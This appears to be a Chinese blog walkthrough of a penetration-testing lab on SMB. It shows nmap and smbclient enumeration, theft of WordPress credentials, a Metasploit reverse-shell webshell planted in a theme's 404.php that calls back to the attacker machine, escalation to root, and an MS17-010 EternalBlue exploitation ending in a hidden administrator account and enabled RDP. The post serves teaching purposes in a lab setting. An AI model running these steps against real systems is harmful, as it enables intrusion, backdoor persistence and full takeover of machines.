SMB漏洞
目錄
一,SMB信息泄露
充電站:
二,MS17-010 (永恒之藍) 復現
一,SMB信息泄露
靶場:192.168.11.167
攻擊機:kali 192.168.11.165
信息探測:
nmap -sV 192.168.11.167可以看到開放了,22 ssh端口,139,445的smb服務端口,以及3306的mysal服務
掃描更詳細的信息:
nmap -A -v -T4 192.168.11.167-A : 探測所有信息 -v : 把探測信息詳細輸出 -T4: nmap使用最大線程數對smb協議進行漏洞分析:
針對SMB協議,使用空口令,嘗試登錄,并查看敏感文件,下載查看
smbclient -L 192.168.11.167掃到三個設備,print$ 是一個打印機設備,share$ 是一個共享文件夾,IPC$是一個空鏈接
分別查看 這三個設備上有什么有用的信息,發現除了share$ 之外我們沒有查看的權限
smbclient '\\192.168.11.167\print$' smbclient '\\192.168.11.167\share$' smbclient '\\192.168.11.167\IPC$'將deets.txt 、robots.txt等文件 get下來
get deets.txtget robots.txt新打開一個運行窗口,查看文件的內容,在查看deets.txt文件時,發現了一個 莫名的password: 12345 先記下來
進一步查看其它文件,進入wordpress文件夾內:
把wordpress的配置文件 get下來,
get wp-config.php在終端中打開wp-config.php文件
gedit wp-config.php找到了 wordpress的 username 和 password ,不知道這個username和password是不是其它服務端口的登錄 賬號和密碼
嘗試一下:
mysql ,不允許遠程登錄
ssh:密碼錯誤
嘗試失敗,
嘗試一下看是否具有SMB遠程溢出的漏洞:
根據剛開始掃描到的 smb的版本信息去 探測有沒有遠程溢出漏洞
searchsploit Samba smbd 3.X - 4.Xsearchsploit Samba smbd 4.3.11-Ubunt沒有smb溢出漏洞
?
針對HTTP協議弱點進行分析:
使用dirb進行后臺探測:
掃到了wordpress的后臺管理界面
使用我們剛才在 wp-config.php中的賬戶和密碼登錄:
這里可以上傳webshell 木馬,進行提權
首先制作一個 webshell,這里用 kali的msfvenom 生成源代碼:
?
這里制作了一個,反彈到 攻擊機 192.168.11.165? 4444端口的木馬
復制源代碼保存 在桌面的 webshell.php 中
啟動監聽
msfconsole然后進行配置:
這里 配置了監聽 192.168.11.165 的4444端口
啟動:
run然后去wordpress 的后臺管理界面 apparent》edit 》404.php,上傳我們剛才制作的webshell代碼:
然后點擊左下角的提交,
然后訪問404 界面 使代碼運行:
瀏覽器訪問:http://192.168.11.167/wordpress/wp-content/themes/twentyfifteen/404.php?然后webshell就會執行
然后我們就會看到方才監聽的端口開始顯示了信息:
輸入 shell 。id 查看當前用戶的權限
優化一下 命令窗口:
python -c "import pty; pty.spawn('/bin/bash')"看一下用戶組:
看到一個 togie用戶
切換到togie用戶,并嘗試提升為root權限:輸入我們剛開始開 deets.txt 文件中獲得的密碼 12345,成功
至此我們已經獲取了最高權限完全攻陷了該服務器
查看/root目錄 看到了flag.txt文件
?
充電站:
1,什么是SMB?
SMB協議作為一種局域網文件共享傳輸協議,常被用來作為共享文件安全傳輸研究的平臺,很流行的協議,它能使你共享文件,磁盤,目錄,打印機,甚至網絡端口
服務器消息塊,又稱網絡文件共享系統,一種應用層網絡傳輸協議,由微軟開發,主要功能是使網絡上的機器能夠共享計算機文件、打印機、串行端口和通訊等資源。它也提供經認證的行程間通信機能。它主要用在裝有Microsoft Windows的機器上,在這樣的機器上被稱為Microsoft Windows Network。
經過Unix服務器廠商重新開發后,它可以用于連接Unix服務器和Windows客戶機,執行打印和文件共享等任務
2,什么是SMB遠程溢出的漏洞,怎么利用?
官方名稱:MS17-010 (永恒之藍勒索病毒)附上一篇,SMB遠程溢出利用的博文:https://www.shystartree.com/2018/07/12/%E4%B8%80%E6%AC%A1SMB%E8%BF%9C%E7%A8%8B%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E7%BB%8F%E5%8E%86%EF%BC%88MS17-010%20EternalBlue%20%EF%BC%89/
MS17-010是一個很出名的漏洞,存在于win 7中 b站上有好多介紹利用視頻,不再贅述
4,msfvenom是什么?
Metasploit介紹
幾乎每一個玩滲透的人都會接觸到Metasploit Framework,簡稱msf。這是一個滲透測試框架,用ruby語言寫的,該框架集成了很多可用的exploit,比如著名的ms08_067等,
msfconsole
這是啟動msf的終端命令,注意因為現在msf默認的數據庫是postgresql,所以在啟動msf之前需要先啟動postgresql數據庫。 在終端中輸入msfconsole即可啟動msf
msfvenom
在之前的msf版本中會有msfencode,msfpayload等工具,學習成本比較高,現在這些工具已經被廢棄了。取而代之的是msfvenom工具,可以看做它是msfencode與msfpayload的結合版,它允許你自行生成想要的payload
?
二,MS17-010 (永恒之藍) 復現
永恒之藍漏洞剛出來的時候,當時很多人是用Shadow Brokers泄露的NSA原生攻擊工具來測試,通過“ Fuzzbunch + Eternalblue 組合拳 ”,雖然可以做出getshell效果,但是整個實現過程非常麻煩,不太適合安全新手進行快速實踐。
到了Kali Linux 2017.03和Kali Linux 2018版,神器Metasploit直接集成了MS17-010的滲透測試代碼,針對Win7和Server2008可以實現getshell,幾分鐘內就可以將完成整個漏洞復現過程。
漏洞環境復現:
攻擊機:kali 2019 192.168.11.165
靶機: windows 7 192.168.11.151
?
啟動 metasploit框架,并搜尋有關 MS17-010 的相關利用模塊:
msfconsolesearch ms17_010可以看到有5 個可以利用的模塊
這里可以得到兩個工具,其中auxiliary/scanner/smb/smb_ms17_010是永恒之藍掃描模塊,exploit/windows/smb/ms17_010_eternalblue是永恒之藍滲透代碼,一般配合使用,前者先掃描,若顯示有漏洞,再進行滲透。
我們先使用 1號 進行 掃描,看靶機上是否有 MS17-010漏洞
若有 ,再用? 2 號模塊進行攻擊
使用模塊 msf > use auxiliary/scanner/smb/smb_ms17_010 設置目標IP或網段 msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.11.151 執行掃描 msf auxiliary(smb_ms17_010) > run可以看到存在 永恒之藍漏洞?(測試過程中,Win7需關閉防火墻)
用? 2 號模塊進行攻擊
使用模塊 msf > use exploit/windows/smb/ms17_010_eternalblue 查看可設置的選項 msf exploit(ms17_010_eternalblue) > show options 設置滲透目標ip msf exploit(ms17_010_eternalblue) > set RHOST 172.16.70.199 執行滲透 msf exploit(ms17_010_eternalblue) > exploit然后就取得了 靶機的控制權;
(如果你的命令行中出現亂碼,那是因為 win和linux的字符格式不兼容,在kali的終端上方的菜單欄中 終端》 設置字符編碼》中文簡體-GBK)
然后創建用戶,賦予用戶管理員權限,開啟靶機的遠程桌面功能,連接靶機桌面
創建用戶名密碼 blue/blue net user blue blue /add 將用戶blue添加入管理組 net localgroup administrators blue /add 開啟遠程桌面功能 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f新開一個終端窗口:
Kali遠程桌面連接Win7 rdesktop 192.168.11.151:3389?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
總結
- 上一篇: SSH远程登录解析(linux)
- 下一篇: 攻防世界———MISC 高手区题解